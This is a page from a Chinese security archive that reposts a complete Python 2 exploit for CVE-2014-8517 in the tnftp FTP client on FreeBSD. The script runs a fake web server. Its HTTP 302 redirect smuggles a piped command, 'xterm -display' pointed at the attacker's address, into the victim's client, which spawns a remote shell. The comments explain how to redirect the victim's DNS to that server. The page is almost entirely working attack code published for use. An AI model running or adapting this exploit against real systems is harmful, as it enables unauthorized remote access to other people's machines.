首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
tnftp - clientside BSD Exploit
来源:dash@hack4.org 作者:dash 发布时间:2014-12-16  
#!/usr/bin/env python2
#
# Exploit Title: [tnftp BSD exploit]
# Date: [11/29/2014]
# Exploit Author: [dash]
# Vendor Homepage: [www.freebsd.org]
# Version: [FreeBSD 8/9/10]
# Tested on: [FreeBSD 9.3]
# CVE : [CVE-2014-8517]
   
# tnftp exploit (CVE-2014-8517)tested against freebsd 9.3
#
# 29 Nov 2014 by dash@hack4.org
#
# usage:
#
# redirect the vulnerable ftp client requests for http to your machine
#
# client will do something like:
#
# you will intercept the dns request and redirect victim to your fake webserver ip
#
# attacker: start on 192.168.2.1 Xnest: Xnest -ac :1
# probably do also xhost+victimip
#
# attacker: python CVE-2014-8517.py 192.168.1.1 81 192.168.1.1
#
# sadly you cannot put a slash behind the | also www-encoded is not working
# plus problems with extra pipes
# this renders a lot of usefull commands useless
# so xterm -display it was ;)
#
# *dirty* *dirdy* *dyrdy* *shell* !
#
   
import os
import sys
import time
import socket
   
   
def usage():
    print "CVE-2014-8517 tnftp exploit"
    print "by dash@hack4.org in 29 Nov 2014"
    print
    print "%s <redirect ip> <redirect port> <reverse xterm ip>"% (sys.argv[0])
    print "%s 192.168.1.1 81 192.168.2.1"% (sys.argv[0])
   
#bind a fake webserver on 0.0.0.0 port 80
def webserveRedirect(redirect):
   
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("0.0.0.0",80))
    s.listen(3)
    h, c = s.accept()
   
    #wait for request
    #print h.recv(1024)
   
    #send 302
    print "[+] Sending redirect :>"
    h.send(redirect)
    s.close()
    return 0
   
#bind a fake webserver on port %rport
def deliverUgga(owned):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("0.0.0.0",rport))
    s.listen(3)
    h, c = s.accept()
   
#   print h.recv(1024)
    print "[+] Deliver some content (shell is spwaned now)"
    h.send(owned)
    s.close()
   
    return 0
   
owned="""HTTP/1.1 200 Found
Date: Fri, 29 Nov 2014 1:00:03 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 5
Connection: close
Content-Type: text/html; charset=iso-8859-1
   
   
ugga ugga
"""
   
if(os.getuid())!=0:
    print "[-] Sorry, you need root to bind port 80!"
    sys.exit(1)
   
if len(sys.argv)<3:
    usage()
    sys.exit(1)
   
rip = sys.argv[1]
rport = int(sys.argv[2])
revip = sys.argv[3]
   
print "[+] Starting tnftp BSD client side exploit (CVE-2014-8517)"
print "[+] Dont forget to run Xnest -ac :1"
   
# ok, lets use xterm -display
cmd = "xterm -display %s:1" % (revip)
cmd = cmd.replace(" ","%20")
   
print "[+] Payload: [%s]" % cmd
   
redirect =  "HTTP/1.1 302\r\n"\
        "Content-Type: text/html\r\n"\
        "Connection: keep-alive\r\n"\
        "Location: http://%s:%d/cgi-bin/|%s\r\n"\
        "\r\n\r\n" % (rip,rport,cmd)
   
#child process owned data delivery
uggapid = os.fork()
if uggapid == 0:
    uggapid = os.getpid()
    deliverUgga(owned)
else:
#child proces for webserver redirect
    webpid = os.fork()
    if webpid == 0:
        webpid = os.getpid()
        webserveRedirect(redirect)
   
   
   
#childs, come home!
try:
    os.waitpid(webpid,0)
except:
    pass
try:
    os.waitpid(uggapid,0)
except:
    pass
   
#oh wait :>
time.sleep(5)
  

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Wordpress Download Manager 2.7
·ActualAnalyzer Cookie Command
·Tuleap PHP Unserialize Code Ex
·phpMyAdmin 4.0.x, 4.1.x, 4.2.x
·WordPress WP Symposium 14.11 S
·HTCSyncManager 3.1.33.0 - Serv
·Advantech AdamView 4.30.003 -
·Avira 14.0.7.342 - (avguard.ex
·VFU 4.10-1.1 - Buffer Overflow
·CodeMeter 4.50.906.503 - Servi
·BulletProof FTP Client 2010 Bu
·ProjectSend r-561 - Arbitrary
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved